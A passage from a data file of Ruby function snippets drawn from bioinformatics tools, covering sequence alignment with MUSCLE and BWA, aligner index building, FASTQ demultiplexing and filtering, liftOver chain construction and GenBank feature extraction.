> 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n l2 = l2 + g2\n end\n end\n\n while repeat == 1\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 > 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n l2 = l2 + g2\n end\n end\n ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n ref = aln_seq[\">ref\"]\n\n #refine alignment\n\n if ref =~ /^(\\-+)/\n l1 = l1 - $1.size\n elsif ref =~ /(\\-+)$/\n l2 = l2 + $1.size\n end\n l1 = 0 if l1 < 0\n if (hxb2_l - l2 - 1) >= l1\n ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n ref = aln_seq[\">ref\"]\n\n ref_size = ref.size\n sim_count = 0\n (0..(ref_size-1)).each do |n|\n ref_base = ref[n]\n test_base = aln_test[n]\n sim_count += 1 if ref_base == test_base\n end\n similarity = (sim_count/ref_size.to_f*100).round(1)\n print `rm -f #{temp_file}`\n print `rm -f #{temp_aln}`\n loc_p1 = l1 + 1\n loc_p2 = hxb2_l - l2\n if seq.size != (loc_p2 - loc_p1 + 1)\n indel = true\n elsif aln_test.include?(\"-\")\n indel = true\n end\n return [loc_p1,loc_p2,similarity,indel,aln_test,ref]\n else\n return [0,0,0,0,0,0,0]\n end\nrescue\n return [0,0,0,0,\"N\",\"N\"]\nend",
"def initialize(names, force_overwrite, ref, software,\n annotation, tophat_aligner, mismatches, err_rate)\n super(names, force_overwrite, ref, software)\n @annotation = annotation\n @tophat_aligner = tophat_aligner\n @mismatches = mismatches\n @err_rate = err_rate\n @mapped_bams = []\n @unmapped_bams = []\n @max_mismatches = 0\n end",
"def index(ref, ref_base, software, annotation = '')\n index_suffix = {\n bowtie1: '4.ebwt',\n bowtie2: '4.bt2',\n bwa: '.sa',\n star: '.star'\n }\n index_cmd = {\n bowtie1: \"bowtie-build -p #{ref} #{ref_base}\",\n bowtie2: \"bowtie2-build -p #{ref} #{ref_base}\",\n bwa: \"bwa index #{ref}\",\n star: \"mkdir #{ref_base} && \"\\\n 'STAR --runMode genomeGenerate' \\\n ' --runThreadN $(nproc)' \\\n \" --genomeDir #{ref_base}\"\\\n \" --genomeFastaFiles #{ref}\"\\\n ' --sjdbOverhang 49' \\\n \" --sjdbGTFfile #{annotation} \"\n }\n\n time = 5\n while File.exist?(\"#{ref_base}.lock\")\n print_e \"#{ref_base}.lock exists. Wait for #{time} seconds.\"\n sleep(time)\n time *= 5\n end\n\n return if software == :tophat ||\n skip_step?(\"#{ref_base}.#{index_suffix[software]}\", 'indexing')\n\n begin\n run_cmd(\"touch #{ref_base}.lock\")\n run_cmd(index_cmd[software])\n ensure\n run_cmd(\"rm -f #{ref_base}.lock\")\n end\n end",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def run_align_assess\n filename = self.generate_fasta_alignment_file_for_all\n string = \"./lib/AlignAssess_wShorterID #{filename} P\"\n seq_array = Array.new\n if system(string)\n seq_id_array = self.sequences.map{|s| s.seq_id}\n new_filename = filename + \"_assess\"\n f = File.new(new_filename, \"r\")\n flag = false\n read_row= 999999999\n cur_row = 0\n while (line = f.gets)\n if cur_row > read_row && flag\n if line == \"\\n\"\n flag =false\n else\n seq_array << line.split(\"\\t\")\n end\n elsif line == \"Pair-wise %ID over shorter sequence:\\n\"\n flag=true\n read_row = cur_row + 2\n end\n cur_row +=1\n end\n range = seq_array.length - 1\n #seq_array.each do |row|\n for row_num in 0..range\n for i in 1..range#(row_num) \n PercentIdentity.first_or_create(:seq1_id=>seq_id_array[row_num],\n :seq2_id=>seq_id_array[i],\n :alignment_name => self.alignment_name,\n :percent_id=>seq_array[row_num][i])\n # print \"[#{row_num}:#{i-1}=>#{row[i]}],\"\n end\n #print \"\\n\"\n end\n end\n end",
"def muscle_sequence2(ref_seq = \"\", test_seq = \"\", temp_dir=File.dirname($0))\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref_seq\n temp_in.puts name\n temp_in.puts test_seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)[\">test\"]\n aln_ref = fasta_to_hash(temp_aln)[\">ref\"]\n File.unlink(temp_file)\n File.unlink(temp_aln)\n return [aln_ref, aln_seq]\nend",
"def build_cmd_ref\n # Example id's: N3K-C3048TP-1GE, N3K-C3064PQ-10GE, N7K-C7009, N7K-C7009\n\n debug \"Product: #{@product_id}\"\n debug \"Files being used: #{@files.join(', ')}\"\n\n @files.each do |file|\n feature = File.basename(file).split('.')[0]\n debug \"Processing file '#{file}' as feature '#{feature}'\"\n feature_hash = load_yaml(file)\n if feature_hash.empty?\n debug \"Feature #{feature} is empty\"\n next\n end\n feature_hash = filter_hash(feature_hash)\n if feature_hash.empty?\n debug \"Feature #{feature} is excluded\"\n @hash[feature] = UnsupportedCmdRef.new(feature, nil, file)\n next\n end\n\n base_hash = {}\n if feature_hash.key?('_template')\n base_hash = CommandReference.hash_merge(feature_hash['_template'])\n end\n\n feature_hash.each do |name, value|\n fail \"No entries under '#{name}' in '#{file}'\" if value.nil?\n @hash[feature] ||= {}\n if value.empty?\n @hash[feature][name] = UnsupportedCmdRef.new(feature, name, file)\n else\n values = CommandReference.hash_merge(value, base_hash.clone)\n @hash[feature][name] = CmdRef.new(feature, name, values, file)\n end\n end\n end\n end",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def getFt \n kword = ARGV[1]\n seq = @gb.to_biosequence\n seqoptions = \"\"\n\n for c in 2..ARGV.length-1\n seqoptions += \"#{ARGV[c]},\"\n end\n \n # look through all features\n @gb.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n if (!ftH[\"gene\"].nil? && ftH[\"gene\"][0].downcase.include?(kword.downcase)) or\n (!ftH[\"product\"].nil? && ftH[\"product\"][0].downcase.include?(kword.downcase)) \n sbeg = loc[0].from.to_i\n send = loc[0].to.to_i\n fasta = Bio::Sequence::NA.new(seq.subseq(sbeg,send))\n position = \"#{sbeg}..#{send}\"\n if loc[0].strand == -1\n fasta.reverse_complement!\n position = \"c#{position}\"\n end\n pep = Bio::Sequence.new(fasta.translate)\n gene = ftH[\"gene\"][0] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"][0] if !ftH[\"product\"].nil?\n if seqoptions.downcase.include?(\"pep\") or seqoptions.downcase.include?(\"prot\")\n puts pep.output_fasta(\"#{@accession}|#{position}|#{ftH[\"protein_id\"][0]}|#{gene}|#{product}|#{@org}\", 60)\n else\n dna = Bio::Sequence.auto(fasta)\n puts dna.output_fasta(\"#{@accession}|#{position}|#{ftH[\"protein_id\"][0]}|#{gene}|#{product}|#{@org}\",60)\n end\n end\n end\nend",
"def align_pairwise(bioseqs, opt={})\n factory = Bio::ClustalW.new\n clustal_opts = hash_opts_to_clustalopts(opt)\n factory.options = clustal_opts\n template = bioseqs.shift\n start_length = []\n pairwise_aligns = bioseqs.map do |bseq|\n clust_al = clustal_align([template, bseq], factory)\n cl_cons = clust_al.consensus\n aligned_string = clust_al[1].to_s\n #(st, len) = find_good_section(aligned_string, opt[:fidelity_length])\n seq_to_use = \n if opt[:consensus_fidelity]\n cl_cons\n else\n aligned_string\n end\n (st, len) = find_good_section(seq_to_use, opt[:fidelity_length])\n if st\n pristine = aligned_string[st, len].gsub('-','') # pristine read (ends removed)\n clustal_align([template.to_s, Bio::Sequence::NA.new(pristine)], factory)\n else\n warn \"a sequence does not meeting min fidelity! using original alignment\" \n clust_al\n end\n\n end\n end",
"def liftchain(outfile)\n #Future: Add option to recycle old chainfile #\n processes = CONFIG[:processes]\n blat_opts = CONFIG[:blat_opts]\n \n cp CONFIG[:source_fa], \"#{RUNDIR}/source.fa\"\n cp CONFIG[:target_fa], \"#{RUNDIR}/target.fa\"\n\n to_2bit \"#{RUNDIR}/source.fa\"\n to_2bit \"#{RUNDIR}/target.fa\"\n\n to_sizes \"#{RUNDIR}/source.2bit\"\n to_sizes \"#{RUNDIR}/target.2bit\"\n\n # Partition target assembly.\n sh \"faSplit sequence #{RUNDIR}/target.fa #{processes} #{RUNDIR}/chunk_\"\n\n parallel Dir[\"#{RUNDIR}/chunk_*.fa\"],\n 'faSplit -oneFile size %{this} 5000 %{this}.5k -lift=%{this}.lft &&' \\\n 'mv %{this}.5k.fa %{this}'\n\n # BLAT each chunk of the target assembly to the source assembly.\n parallel Dir[\"#{RUNDIR}/chunk_*.fa\"],\n \"blat -noHead #{blat_opts} #{RUNDIR}/source.fa %{this} %{this}.psl\"\n\n parallel Dir[\"#{RUNDIR}/chunk_*.fa\"],\n \"liftUp -type=.psl -pslQ -nohead\" \\\n \" %{this}.psl.lifted %{this}.lft warn %{this}.psl\"\n\n # Derive a chain file each from BLAT's .psl output files.\n parallel Dir[\"#{RUNDIR}/chunk_*.psl.lifted\"],\n 'axtChain -psl -linearGap=medium' \\\n \" %{this} #{RUNDIR}/source.2bit #{RUNDIR}/target.2bit %{this}.chn\"\n\n # Sort the chain files.\n parallel Dir[\"#{RUNDIR}/chunk_*.chn\"],\n 'chainSort %{this} %{this}.sorted'\n\n # Combine sorted chain files into a single sorted chain file.\n sh \"chainMergeSort #{RUNDIR}/*.chn.sorted | chainSplit #{RUNDIR} stdin -lump=1\"\n mv \"#{RUNDIR}/000.chain\", \"#{RUNDIR}/combined.chn.sorted\"\n\n # Derive net file from combined, sorted chain file.\n sh 'chainNet' \\\n \" #{RUNDIR}/combined.chn.sorted #{RUNDIR}/source.sizes #{RUNDIR}/target.sizes\" \\\n \" #{RUNDIR}/combined.chn.sorted.net /dev/null\"\n\n # Subset combined, sorted chain file.\n sh 'netChainSubset' \\\n \" #{RUNDIR}/combined.chn.sorted.net #{RUNDIR}/combined.chn.sorted\" \\\n \" #{RUNDIR}/liftover.chn\"\nend",
"def convert_alignment(args={})\n i, o = args[:in], args[:out]\n \n ff = Bio::FlatFile.auto(i).to_a\n aln = Bio::Alignment.new(ff)\n File.open(o, 'w') do |o|\n o.write aln.output :phylip\n end\n \nend",
"def get_correct_filename(annotation, files, submission)\n if annotation.position == -1\n # position -1 maps to the Autograder Output\n \"Autograder Output\"\n elsif files && !annotation.position.nil?\n # if the submission is an archive, use filename in archive;\n # otherwise, use submission filename\n Archive.get_nth_filename(files, annotation.position)\n else\n submission.filename\n end\n end",
"def process()\n # For lanes that don't need alignment, run post run and exit\n if @reference.eql?(\"sequence\")\n puts \"No alignment to perform since reference is \\\"sequence\\\"\"\n puts \"Running postrun script\"\n runPostRunCmd(\"\")\n exit 0\n end\n\n outputFile1 = @sequenceFiles[0] + \".sai\"\n\n alnCmd1 = buildAlignCommand(@sequenceFiles[0], outputFile1) \n obj1 = Scheduler.new(@fcAndLane + \"_aln_Read1\", alnCmd1)\n obj1.setMemory(@maxMemory)\n obj1.setNodeCores(@cpuCores)\n obj1.setPriority(@priority)\n obj1.runCommand()\n alnJobID1 = obj1.getJobName()\n\n # paired end flowcell\n if @isFragment == false\n outputFile2 = @sequenceFiles[1] + \".sai\"\n alnCmd2 = buildAlignCommand(@sequenceFiles[1], outputFile2)\n obj2 = Scheduler.new(@fcAndLane + \"_aln_Read2\", alnCmd2)\n obj2.setMemory(@maxMemory)\n obj2.setNodeCores(@cpuCores)\n obj2.setPriority(@priority)\n obj2.runCommand()\n alnJobID2 = obj2.getJobName()\n\n sampeCmd = buildSampeCommand(outputFile1, outputFile2, @sequenceFiles[0],\n @sequenceFiles[1])\n obj3 = Scheduler.new(@fcAndLane + \"_sampe\", sampeCmd)\n obj3.setMemory(@lessMemory)\n obj3.setNodeCores(@minCpuCores)\n obj3.setPriority(@priority)\n obj3.setDependency(alnJobID1)\n obj3.setDependency(alnJobID2)\n obj3.runCommand()\n makeSamJobName = obj3.getJobName()\n else\n # Flowcell is fragment\n samseCmd = buildSamseCommand(outputFile1, @sequenceFiles[0])\n obj3 = Scheduler.new(@fcAndLane + \"_samse\", samseCmd)\n obj3.setMemory(@lessMemory)\n obj3.setNodeCores(@minCpuCores)\n obj3.setPriority(@priority)\n obj3.setDependency(alnJobID1)\n obj3.runCommand()\n makeSamJobName = obj3.getJobName()\n end\n\n # Sort a BAM\n sortBamCmd = sortBamCommand()\n obj5 = Scheduler.new(@fcAndLane + \"_sortBam\", sortBamCmd)\n obj5.setMemory(@lessMemory)\n obj5.setNodeCores(@minCpuCores)\n obj5.setPriority(@priority)\n obj5.setDependency(makeSamJobName)\n obj5.runCommand()\n sortBamJobName = obj5.getJobName() \n\n # Mark duplicates on BAM\n markedDupCmd = markDupCommand()\n obj6 = Scheduler.new(@fcAndLane + \"_markDupBam\", markedDupCmd)\n obj6.setMemory(@lessMemory)\n obj6.setNodeCores(@minCpuCores)\n obj6.setPriority(@priority)\n obj6.setDependency(sortBamJobName)\n obj6.runCommand()\n markedDupJobName = obj6.getJobName()\n prevCmd = markedDupJobName\n\n # Filter out phix reads\n if @filterPhix == true\n phixFilterCmd = filterPhixReadsCmd(@markedBam)\n objX = Scheduler.new(@fcAndLane + \"_phixFilter\", phixFilterCmd)\n objX.setMemory(@lessMemory)\n objX.setNodeCores(@minCpuCores)\n objX.setPriority(@priority)\n objX.setDependency(prevCmd)\n objX.runCommand()\n phixFilterJobName = objX.getJobName()\n prevCmd = phixFilterJobName\n end\n\n # Fix mate information for paired end FC\n if @isFragment == false\n fixMateCmd = fixMateInfoCmd()\n objY = Scheduler.new(@fcAndLane + \"_fixMateInfo\" + @markedBam, fixMateCmd)\n objY.setMemory(@lessMemory)\n objY.setNodeCores(@minCpuCores)\n objY.setPriority(@priority)\n objY.setDependency(prevCmd)\n objY.runCommand()\n fixMateJobName = objY.getJobName()\n prevCmd = fixMateJobName\n end\n\n # Fix unmapped reads. When a read aligns over the boundary of two\n # chromosomes, BWA marks this read as unmapped but does not reset CIGAR to *\n # and mapping quality zero. This causes picard's validator to complain.\n # Hence, we fix that anomaly here.\n fixCIGARCmd = buildFixCIGARCmd(@markedBam)\n fixCIGARObj = Scheduler.new(@fcAndLane + \"_fixCIGAR\" + @markedBam, fixCIGARCmd)\n fixCIGARObj.setMemory(@lessMemory)\n fixCIGARObj.setNodeCores(@minCpuCores)\n fixCIGARObj.setPriority(@priority)\n fixCIGARObj.setDependency(prevCmd)\n fixCIGARObj.runCommand()\n fixCIGARJobName = fixCIGARObj.getJobName()\n prevCmd = fixCIGARJobName\n\n # Calculate Alignment Stats\n mappingStatsCmd = calculateMappingStats()\n obj7 = Scheduler.new(@fcAndLane + \"_AlignStats\", mappingStatsCmd)\n obj7.setMemory(@lessMemory)\n obj7.setNodeCores(@minCpuCores)\n obj7.setPriority(@priority)\n obj7.setDependency(prevCmd)\n obj7.runCommand()\n runStatsJobName = obj7.getJobName()\n prevCmd = runStatsJobName\n\n if @chipDesign != nil && !@chipDesign.empty?()\n captureStatsCmd = buildCaptureStatsCmd()\n capStatsObj = Scheduler.new(@fcAndLane + \"_CaptureStats\", captureStatsCmd)\n capStatsObj.setMemory(@lessMemory)\n capStatsObj.setNodeCores(@minCpuCores)\n capStatsObj.setPriority(@priority)\n capStatsObj.setDependency(prevCmd)\n capStatsObj.runCommand()\n capStatsJobName = capStatsObj.getJobName()\n prevCmd = capStatsJobName\n end\n\n # Hook to run code after final BAM is generated\n runPostRunCmd(prevCmd)\n end",
"def generate_fastq\n\n # Generate FASTQ file list, expanding patterns if found.\n fastq_input_file_list = []\n fastq_output_prefix_list = []\n fastq_output_group_list = []\n ARGV.each do |fastq_input_file|\n if fastq_input_file =~ /[\\+\\?\\*]/\n # File is regexp: use it to do our own \"glob\".\n # If the regexp has at least one group in it, save the group match\n # in a corresponding list to use in making the output files.\n fastq_input_dir = File.dirname(fastq_input_file)\n fastq_input_patt = File.basename(fastq_input_file)\n\n Dir.entries(fastq_input_dir).sort().each do |entry|\n if entry =~ /#{fastq_input_patt}()/o\n fastq_input_file_list << entry\n if not @out_prefix.nil?\n fastq_output_prefix_list << @out_prefix\n else\n fastq_output_prefix_list << entry[0..Regexp.last_match.begin(1)-1-1] # Second -1 is for underline.\n end\n fastq_output_group_list << $1\n end\n end\n else\n if File.file? fastq_input_file\n fastq_input_file_list << fastq_input_file\n fastq_output_prefix_list << @out_prefix\n end\n end\n end\n\n die \"no FASTQ files found\" if fastq_input_file_list.length == 0\n\n STDERR.puts(\"Input files: #{fastq_input_file_list}\") if @verbose\n\n fastq_list = fastq_input_file_list.zip(fastq_output_prefix_list, fastq_output_group_list)\n fastq_list.each do |fastq_input_file, fastq_output_prefix, fastq_output_group|\n\n # If we are splitting to subfiles, reset the output sub filenames to\n # the new destination for the new input file; also reset statistics.\n if @save_subfiles\n if fastq_output_group == \"\"\n fastq_output_group_mod = fastq_output_group\n else\n fastq_output_group_mod = \"_#{fastq_output_group}\"\n end\n @pass_sub_filename = File.join(@pass_dir, \"#{fastq_output_prefix}_pf#{fastq_output_group_mod}.fastq\")\n @pass_sub_filename += \".gz\" if @compress\n @reject_sub_filename = File.join(@reject_dir, \"#{fastq_output_prefix}_reject#{fastq_output_group_mod}.fastq\")\n @reject_sub_filename += \".gz\" if @compress\n\n @stats_sub_filename = File.join(@stats_dir, \"#{fastq_output_prefix}_seq_stats#{fastq_output_group_mod}.txt\")\n @pass_sub_read_cnt = @reject_sub_read_cnt = @total_sub_read_cnt = 0\n end\n\n if @save_subfiles\n open_fastq_sub_output_files\n end\n\n # split one FASTQ file into post-filter and reject FASTQ\n STDERR.puts \"Processing #{fastq_input_file}...\" if @verbose\n fastq_input_fp = open_fastq_input(fastq_input_file)\n if fastq_input_fp.nil?\n warn \"#{fastq_input_file} is empty...skipping\"\n next\n end\n begin\n while fastq_input_fp.readline\n header_line = $_\n if header_line !~ /^@/\n STDERR.puts \"Missing header line (#{header_line})...exiting\"\n exit(-1)\n end\n\n header_fields = header_line.split(/[ _]/)\n die \"header parse error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER} [#{header_fields.join(\"!\")}]\" if header_fields.size != 2\n\n sub_header_fields = header_fields[1].split(\":\",-1)\n die \"sub header parse error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER} [#{header_fields.join(\":\")}(#{sub_header_fields.join(\":\")})]\" if sub_header_fields.size != 4\n\n @total_read_cnt += 1\n @total_sub_read_cnt += 1\n\n if sub_header_fields[1] == \"N\"\n out = @pass\n @pass_read_cnt += 1\n out_sub = @pass_sub\n @pass_sub_read_cnt += 1\n elsif sub_header_fields[1] == \"Y\"\n out = @reject\n @reject_read_cnt += 1\n out_sub = @reject_sub\n @reject_sub_read_cnt += 1\n else\n die \"filter field value error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER}...skipping read\"\n out = nil\n end\n\n # Read the rest of the sequence.\n seq_line = fastq_input_fp.readline\n plus_line = fastq_input_fp.readline\n if plus_line !~ /^\\+/\n STDERR.puts \"Malformed FASTQ +line (#{plus_line})\"\n end\n qual_line = fastq_input_fp.readline\n\n # Output the sequence to whatever file was chosen above.\n if !out.nil?\n if not @remove_spaces\n out.print \"#{header_line}\"\n out_sub.print \"#{header_line}\" if not out_sub.nil?\n else\n out.puts header_fields.join(\"_\")\n out_sub.puts header_fields.join(\"_\") if not out_sub.nil?\n end\n out.print \"#{seq_line}\"\n out.print \"#{plus_line}\"\n out.print \"#{qual_line}\"\n if not out_sub.nil?\n out_sub.print \"#{seq_line}\"\n out_sub.print \"#{plus_line}\"\n out_sub.print \"#{qual_line}\"\n end\n end\n end # while\n\n rescue EOFError\n\n end\n\n fastq_input_fp.close()\n\n if @save_subfiles\n close_fastq_sub_output_files\n store_stats @stats_sub_filename, @pass_sub_read_cnt, @reject_sub_read_cnt, @total_sub_read_cnt\n end\n\n end # fastq_list.each\n end",
"def buildAlignCommand(readFile, outputFile)\n cmd = \"time \" + @bwaPath + \" aln -t \" + @cpuCores.to_s + \" -I \" +\n @reference + \" \" + readFile + \" > \" + outputFile\n return cmd\n end",
"def add_result_trimmed_fasta(base, _opts)\n return nil unless\n result_files_exist?(base, '.CoupledReads.fa') ||\n result_files_exist?(base, '.SingleReads.fa') ||\n result_files_exist?(base, %w[.1.fasta .2.fasta])\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n coupled: '.CoupledReads.fa',\n single: '.SingleReads.fa',\n pair1: '.1.fasta',\n pair2: '.2.fasta'\n )\n end",
"def add_result_trimmed_fasta(base, _opts)\n return nil unless\n result_files_exist?(base, '.CoupledReads.fa') ||\n result_files_exist?(base, '.SingleReads.fa') ||\n result_files_exist?(base, %w[.1.fasta .2.fasta])\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n coupled: '.CoupledReads.fa',\n single: '.SingleReads.fa',\n pair1: '.1.fasta',\n pair2: '.2.fasta'\n )\n end",
"def sequence_locator(ref_option = :HXB2)\n out_array = []\n dna_seq = self.dna_hash\n title = self.title\n\n uniq_dna = dna_seq.uniq_hash\n\n uniq_dna.each do |seq,names|\n s = ViralSeq::Sequence.new('',seq)\n loc1 = s.locator(ref_option)\n s.rc!\n loc2 = s.locator(ref_option)\n loc1[2] >= loc2[2] ? (direction = :+; loc = loc1): (direction = :-; loc = loc2)\n\n names.each do |name|\n out_array << ([title, name, ref_option.to_s, direction.to_s] + loc)\n end\n end\n return out_array\n end",
"def add_result_trimmed_fasta(base, _opts)\n return nil unless\n result_files_exist?(base, \".CoupledReads.fa\") or\n result_files_exist?(base, \".SingleReads.fa\") or\n result_files_exist?(base, %w[.1.fasta .2.fasta])\n r = MiGA::Result.new(\"#{base}.json\")\n add_files_to_ds_result(r, name, coupled: \".CoupledReads.fa\",\n single: \".SingleReads.fa\", pair1: \".1.fasta\", pair2: \".2.fasta\")\n end",
"def gb_to_fasta(gb, fasta, seq_type=:nt, task_name=\"rast_annotate\")\n abort \"FATAL: Task #{task_name} requires specifying STRAIN_NAME\" unless STRAIN_NAME\n abort \"FATAL: gb_to_fasta called with invalid seq_type\" unless [:nt, :aa].include? seq_type\n system <<-SH\n module load python/2.7.6\n module load py_packages/2.7\n python #{REPO_DIR}/scripts/gb_to_fasta.py -i #{gb} -s #{seq_type} -o #{fasta}\n SH\nend",
